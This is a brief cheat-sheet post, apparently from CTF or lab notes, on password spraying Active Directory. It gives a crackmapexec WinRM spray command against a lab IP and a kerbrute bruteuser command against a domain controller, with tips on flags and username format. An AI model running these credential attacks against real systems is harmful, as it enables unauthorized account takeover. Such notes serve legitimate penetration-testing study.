Password Spraying
Post

Password Spraying

Crackmapexec

While executing a Password Spraying attack with crackmapexec always run the --continue-on-success flag, sometimes there are some cases when two users can have the same password

1
crackmapexec winrm 10.10.10.248 -u users -p 'NewIntelligenceCorpUser9876' --continue-on-success

Examples: Intelligence

Kerbrute

Users file must be only the user not the domain (correct: ksimpson, incorrect: ksimpson@scrm.local)

1
kerbrute bruteuser --dc 10.10.11.168 -d scrm.local <users> <password>